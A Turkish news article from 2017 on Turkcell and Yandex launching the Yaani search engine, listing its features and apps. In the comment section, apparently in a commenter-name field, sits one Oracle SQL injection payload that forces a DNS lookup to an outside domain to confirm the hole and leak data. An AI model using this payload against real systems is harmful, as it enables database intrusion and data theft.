Google'a Rakip: Yerli Arama Motoru Yaani

Turkcell ve Yandex işbirliği sonucu artık bizim de arama motorumuz var. Yaani arama motoru ile ilgili detaylar haberimizde...
25 Ekim 2017 11:24
Googlea Rakip: Yerli Arama Motoru Yaani
Turkcell, bugün düzenlemiş olduğu etkinlikte yerli arama motoru Yaani'yi tanıttı. Yerli arama motoru Yaani, sunduğu özellikler ile ön plana çıkıyor. Peki, yerli arama motoru Yaani'nin diğer arama motorlarına göre farklılıkları neler ve kullanıcılara neler sunuyor?
 
 
Yaani neler sunuyor?
 
Yaani; aile koruma modu, konum bazlı arama, en yakındaki vizyon filmleri arama, kota yemeyen arama, sosyal medya gündemi ve alışverişte en ucuz seçenek gibi opsiyonları bünyesinde barındırıyor. Yandex işbirliği ile geliştirilen arama motoru Yaani, uygulamaları ile de ön plana çıkıyor. Ayrıca Turkcell kullanıcıları Yaani uygulaması ile arama yaparken, internet kotalarından harcamıyor.
 
Yaani'nin App Store ve Google Play Store'da uygulaması da bugünden itibaren indirilebiliyor. İlerleyen dönemlerde yerli telefonlarda, Yaani uygulaması kurulu olarak gelecek.
 
 
Yaani kullanan kullanıcılar, önemli buldukları her şeye tek bir yerden erişim sağlayabilecekleri kişiselleştirilmiş bir internet deneyimine de sahip oluyor.
 
Yaani ile istediğiniz bilgiyi arayabilir, güncel haberleri okuyabilir, anında bulunduğunuz lokasyondaki hava durumunu öğrenebilir, size yakın restoranlar arayabilir, en yakın sinemada oynayan filmleri ve seansları öğrenebilir, aradığınız müziği Fizy ile dinleyebilir, favori sitelerinizi kaydedip arkadaşlarınızla paylaşabilirsiniz.
 
teknolojioku
145635
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
25 Ekim 2017, Çarşamba 22:21
Ülkemiz adına bu tarz haberleri görmek harika. Ben yaani.st ili içinde önemlidir diye düşünüyorum. Gideceğimiz mekanları rahatlıkla bulabileceğiz.
Bu haberler ilginizi çekebilir